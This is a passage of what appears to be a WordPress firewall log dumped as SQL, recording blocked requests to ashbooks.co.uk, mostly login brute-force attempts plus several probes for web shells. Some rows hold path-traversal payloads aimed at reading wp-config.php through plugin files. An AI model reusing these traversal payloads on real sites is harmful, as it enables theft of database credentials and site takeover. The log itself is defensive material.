Safari\\/537.36\"}','8W79XFit4LNYpDZGg0SRlVBf',0,1637315225.0600,408,'','POST',403,0,600,0,1,'',0),('51.75.15.189',860557245,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','V4eTElv1xd7UXRHzpBuGA26i',0,1637317315.6739,516,'','POST',403,0,600,0,1,'',0),('187.49.234.46',3140610606,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','Tn8kVBFxjc9uoHaPrgWv2eql',0,1637319166.7922,510,'','POST',403,0,600,0,1,'',0),('51.15.160.22',856662038,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','0ZrcjPahFKdWmv7zQ2sYBGDJ',0,1637321003.9028,313,'','POST',403,0,600,0,1,'',0),('23.160.194.117',396411509,'','https://ASHBOOKS.CO.UK/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','P3XFncGkITbRE7r1m4CH90Nj',0,1637323220.9346,733,'','POST',403,0,515,0,1,'',0),('183.91.11.75',3076197195,'','https://ASHBOOKS.CO.UK/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','8eWDjofdGXJhRz2ZONqVTrFI',0,1637323270.8354,231,'','POST',403,0,515,0,1,'',0),('89.46.105.158',1496213918,'','https://ashbooks.co.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','SX5DdiJsMI0av37Z2ToL4uCc',0,1637323523.1663,496,'','POST',403,0,515,0,1,'',0),('107.172.227.152',1806492568,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729 Safari\\/537.36\"}','zFcy1pmHxVvISdl5CPo2hJU8',0,1637324251.1686,449,'','POST',403,0,600,0,1,'',0),('122.128.106.186',2055236282,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','GCnWk84aw0XJ9EQ3YROM2jFA',0,1637324633.8919,650,'','POST',403,0,600,0,1,'',0),('103.41.204.82',1730792530,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','ZbJM5YQzp6Hc87mrFN3tawWg',0,1637328632.5884,491,'','POST',403,0,600,0,1,'',0),('148.66.129.233',2487386601,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','WhVjoUMTwad1lcOKxXYB6iCQ',0,1637330401.0513,653,'','POST',403,0,600,0,1,'',0),('144.76.199.105',2420950889,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','MEoTiVekwYcOl7HuR8FNxGgh',0,1637332316.9916,463,'','POST',403,0,600,0,1,'',0),('138.197.12.140',2328169612,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','jMtc79nGQizJhdWmSFbDXsPp',0,1637334159.2081,637,'','POST',403,0,600,0,1,'',0),('142.93.79.34',2388479778,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','4vCNPutf7aLOloH3EeDs5ipK',0,1637335968.1071,518,'','POST',403,0,600,0,1,'',0),('207.180.213.165',3484734885,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','BZP7rTm2jSq1VCfEFXALixJw',0,1637337706.1280,1344,'','POST',403,0,600,0,1,'',0),('217.9.143.94',3641282398,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','gwtH4hKl6IyaEUTexCz2d9Ao',0,1637339506.2768,488,'','POST',403,0,600,0,1,'',0),('208.113.186.18',3497114130,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','EjTA5JhGolm9P83UdyfLnibt',0,1637343073.1260,677,'','POST',403,0,600,0,1,'',0),('139.162.179.198',2342695878,'','https://ashbooks.co.uk/wp-includes/js/tinymce/plugins/lists/lists/index.php?ARRAY=5o3939313633373430323231302p22687474703n5p2s5p2s7777772r73686s7061747n6s652r636s6q5p2s6s70616p656634305p2s7374796p652r637373225q','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"ashbooks.co.uk\"}','1drQtx2ZwHs0oplgA8keYDhv',0,1637343320.7345,164,'','GET',403,0,700,0,1,'',0),('204.12.198.244',3423389428,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','EqFmHgNMRLPAe1oBh8vCcG5d',0,1637347957.3513,465,'','POST',403,0,600,0,1,'',0),('67.205.11.6',1137511174,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','SCzmRp1HYLTd9KAOU6bXEovB',0,1637348791.7057,501,'','POST',403,0,600,0,1,'',0),('198.144.187.104',3331373928,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497 Safari\\/537.36\"}','5L3dQxj6RiGD2rYtO4cwa8A0',0,1637349646.7255,423,'','POST',403,0,600,0,1,'',0),('185.63.173.50',3107958066,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','6UCDb5kzPYKVvWRHltE9y48p',0,1637350454.8270,627,'','POST',403,0,600,0,1,'',0),('45.158.15.145',765333393,'','https://ashbooks.co.uk/wp-content/themes/sketch/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','vcQJrzVdY59otySF1COBgnMD',0,1637350848.8626,441,'','GET',403,0,700,0,1,'',0),('35.241.123.16',603028240,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','pOn02cPGeJDUZKdS439XmlWI',0,1637351451.3061,519,'','POST',403,0,600,0,1,'',0),('89.187.170.168',1505471144,'','https://ashbooks.co.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko\\/20100101 Firefox\\/83.0\"}','V9R45D8NQBCnsAqzEtgjH0Le',0,1637351987.7737,196,'','GET',403,0,520,0,1,'',0),('81.88.52.175',1364735151,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','pzohw1eE5OMTkJNWUj7BPxm4',0,1637352423.0188,2359,'','POST',403,0,600,0,1,'',0),('77.77.212.90',1296946266,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','nJbWs6LToZXwR9MB4gk2VG3y',0,1637353496.3805,463,'','POST',403,0,600,0,1,'',0),('67.227.155.85',1138989909,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','fvUexWZwNAtyunbB8FpHEPhS',0,1637354571.9711,503,'','POST',403,0,600,0,1,'',0),('173.212.192.52',2916401204,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','kLqmYlXZt8voKuyTD3Qph19G',0,1637355641.1231,508,'','POST',403,0,600,0,1,'',0),('96.125.171.153',1618848665,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','f4MF1eER7rtz9WVGuiAjpPag',0,1637356704.5813,535,'','POST',403,0,600,0,1,'',0),('35.202.150.249',600479481,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','v1LDY0gbru4qFzBmpPc9RQEZ',0,1637357849.3352,548,'','POST',403,0,600,0,1,'',0),('64.111.126.32',1081048608,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','yvGP3ud8IMleb7EXmTD1RJ6t',0,1637360178.5711,556,'','POST',403,0,600,0,1,'',0),('194.246.93.146',3270925714,'','https://ashbooks.co.uk/wp-content/plugins/Enigma2.php?boarddir=..%2F..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','8gBqehPtZQ46lnFYyRG0Hi9M',0,1637360519.1796,481,'','GET',403,0,700,0,1,'',0),('194.246.93.146',3270925714,'','https://ashbooks.co.uk/wp-content/plugins/abtest/abtest_admin.php?action=..%2F..%2F..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','ZqXM9uHgskpB07dE5UOSroAN',0,1637360520.1944,1293,'','GET',403,0,700,0,1,'',0),('194.246.93.146',3270925714,'','https://ashbooks.co.uk/wp-content/plugins/advanced-custom-fields/core/actions/export.php?acf_abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','diUplT3DFwHM6Yz91oI8KkQc',0,1637360521.6752,145,'','GET',403,0,700,0,1,'',0),('194.246.93.146',3270925714,'','https://ashbooks.co.uk/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=..%2F..%2F..%2F..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','lvoWXRtupg8jmi6dE4Ax0ZLC',0,1637360522.0087,659,'','GET',403,0,700,0,1,'',0),('72.167.53.106',1218917738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','UCkOh0rNesp6qPli7oyIZjuc',0,1637361292.5726,292,'','POST',403,0,600,0,1,'',0),('13.94.249.188',224328124,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','lg7LBY025MXju4nQqmyFtJRD',0,1637363497.1661,445,'','POST',403,0,600,0,1,'',0),('62.113.217.22',1047648534,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','nAEIsjY690RDvM4w1Jkcf2Sb',0,1637364520.9315,440,'','POST',403,0,600,0,1,'',0),('82.146.44.214',1385311446,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','fLJK8N3mXSUxnRetbvrFyBaH',0,1637365550.4079,466,'','POST',403,0,600,0,1,'',0),('162.240.27.242',2733644786,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','1jTIVydKwAxhRbc9EW7lvrUa',0,1637366594.0838,966,'','POST',403,0,600,0,1,'',0),('177.55.111.14',2973200142,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','egYjxOZ0MpVQ3INyzSc5AGPi',0,1637368751.1674,483,'','POST',403,0,600,0,1,'',0),('202.189.179.194',3401429954,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','XnwbaV6lYsR3NfuWhgF5B2Tk',0,1637369766.7455,1087,'','POST',403,0,600,0,1,'',0),('155.94.163.77',2606670669,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','68I5RfbyPnJzihldgaeDvECG',0,1637370850.0972,494,'','POST',403,0,600,0,1,'',0),('165.227.230.191',2783176383,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','dTl2fwheqYkLEvtFrJKm40QW',0,1637371939.9367,505,'','POST',403,0,600,0,1,'',0),('67.205.36.137',1137517705,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','NW85xdvC3wQy2zAVJu7FIePk',0,1637373077.4638,1268,'','POST',403,0,600,0,1,'',0),('103.144.253.38',1737555238,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','Rx4ezWctCTSyV8puaXPHQsFL',0,1637374367.1309,1335,'','POST',403,0,600,0,1,'',0),('198.144.180.93',3331372125,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683 Safari\\/537.36\"}','VLkwmCS4ul9K8TMIzcE5xsFG',0,1637375127.5606,4225,'','POST',403,0,600,0,1,'',0),('167.172.151.91',2813106011,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','5EWauzHZPGkXeOFJibtNMSK8',0,1637375592.0565,707,'','POST',403,0,600,0,1,'',0),('103.15.232.195',1729095875,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','gWexVfvrdbOcpEjR09AL7a6B',0,1637377966.3455,745,'','POST',403,0,600,0,1,'',0),('8.130.55.145',142751633,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','0mAPagU9V1tDoEQYJb2KIcij',0,1637379107.2050,467,'','POST',403,0,600,0,1,'',0),('217.79.178.53',3645878837,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.43 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36 OPR\\/76.0.4017.123\"}','KhcAdyOrE3Wgsowl0GpjkqaM',0,1637380055.0361,484,'','POST',403,0,600,0,1,'',0),('62.182.159.89',1052155737,'','https://ashbooks.co.uk/wp-content/plugins/autoptimize/fw.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','FOL3C1VJ2hvNYRrXG54ApMEc',0,1637381471.5855,193,'','GET',403,0,700,0,1,'',0),('34.92.58.160',576469664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','8WKIBmtpsijJGLvDU2nTXgEa',0,1637381565.9503,824,'','POST',403,0,600,0,1,'',0),('69.30.225.182',1159651766,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','JqYoZtrkQG6ISelOc8bCF4a5',0,1637381626.8188,168,'','POST',403,0,600,0,1,'',0),('162.240.16.237',2733641965,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','t4pLQJXzDOhWywUNmPBCHYKE',0,1637382765.3110,497,'','POST',403,0,600,0,1,'',0),('34.147.48.161',580071585,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','H1FOaktYAUXRgySjDdMoQKcu',0,1637383848.0865,507,'','POST',403,0,600,0,1,'',0),('147.182.192.77',2478227533,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','nkAcHM3RdSB107FqmjUWreY2',0,1637386539.7854,562,'','POST',403,0,600,0,1,'',0),('103.28.49.63',1729900863,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','ZNFkApK5Yc86g9GX3m4Q2ywH',0,1637387914.4937,523,'','POST',403,0,600,0,1,'',0),('163.178.170.141',2746395277,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','Vgauj8NPZUvoFhtKlTsCbSen',0,1637389277.6641,472,'','POST',403,0,600,0,1,'',0),('103.114.144.212',1735561428,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','vaKSNG7iprXWIDn8TZxAhOCu',0,1637390592.6613,550,'','POST',403,0,600,0,1,'',0),('103.159.224.34',1738530850,'','https://ashbooks.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SFNDycZJnhg3TAYovi2braqC',0,1637393490.5009,1429,'','GET',403,0,700,0,1,'',0),('103.159.224.34',1738530850,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Myna79EudcAFULmCOPkiNqDr',0,1637393494.4993,453,'','GET',403,0,700,0,1,'',0),('103.159.224.34',1738530850,'','https://ashbooks.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FLksjznAWwgVmZ6x9u3yi0aX',0,1637393497.9323,394,'','GET',403,0,700,0,1,'',0),('103.159.224.34',1738530850,'','https://ashbooks.co.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8CRjZwUBhVMxos6av2O3putf',0,1637393501.4928,791,'','GET',403,0,700,0,1,'',0),('103.159.224.34',1738530850,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WAs3OzNvlH57VmEw02ufR9gJ',0,1637393506.2844,445,'','GET',403,0,700,0,1,'',0),('103.159.224.34',1738530850,'','https://ashbooks.co.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lf0e3JDrNT4pXajxZ5CmvKnd',0,1637393509.8168,396,'','GET',403,0,700,0,1,'',0),('103.159.224.34',1738530850,'','https://ashbooks.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','y4YKecOpkMvzna9EhXB7VTwL',0,1637393513.1664,435,'','GET',403,0,700,0,1,'',0),('159.203.115.159',2680910751,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','2ZSwrNgVxFGMJp7nDAIYQREe',0,1637393538.1067,484,'','POST',403,0,600,0,1,'',0),('173.236.136.5',2917959685,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','mfHq90VA7CTQeMUWoP6yXYiE',0,1637394717.9322,811,'','POST',403,0,600,0,1,'',0),('201.149.55.226',3381999586,'','https://ashbooks.co.uk/wp-content/plugins/wp-members-master/wp-tag.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"ashbooks.co.uk\"}','elR1xF8u6AqEhDCtYGpZH9ob',0,1637395628.0452,422,'','GET',403,0,700,0,1,'',0),('69.163.224.119',1168367735,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','NYDQ0WfAFm8dPtuIpMevxwqU',0,1637397750.9336,530,'','POST',403,0,600,0,1,'',0),('91.221.37.58',1541219642,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','RLjqSasg8yM9hQ3UKdCXekmO',0,1637399376.1149,458,'','POST',403,0,600,0,1,'',0),('198.46.208.147',3324956819,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904 Safari\\/537.36\"}','Rywxh0ecWZdBDMGTOASiVHuK',0,1637400310.6369,444,'','POST',403,0,600,0,1,'',0),('95.111.197.125',1601160573,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','QpRyJNOdwYg1hjSXc8ACoBke',0,1637400850.2701,500,'','POST',403,0,600,0,1,'',0),('64.225.29.51',1088494899,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','sHhabOGZMoU3gLwIJQBdq4tj',0,1637402491.0567,495,'','POST',403,0,600,0,1,'',0),('155.133.129.13',2609217805,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','1lmupWPUZE84HtGjcOQvxK3I',0,1637404177.0544,718,'','POST',403,0,600,0,1,'',0),('159.65.238.248',2671898360,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','9aJ3tbipdkjuYxVyBe0URAhm',0,1637405495.1667,432,'','POST',403,0,600,0,1,'',0),('88.198.22.11',1489376779,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','TGpVMuXmf9nhW16kbLwgdQKc',0,1637408139.4299,3597,'','POST',403,0,600,0,1,'',0),('80.249.174.66',1358540354,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','jp6DBgTulvNGoEFb5JzY70AQ',0,1637409427.0836,497,'','POST',403,0,600,0,1,'',0),('159.203.115.159',2680910751,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','65LPOE4CatvqWxUdyVcopS1Z',0,1637410862.2982,757,'','POST',403,0,600,0,1,'',0),('157.245.95.172',2650103724,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like 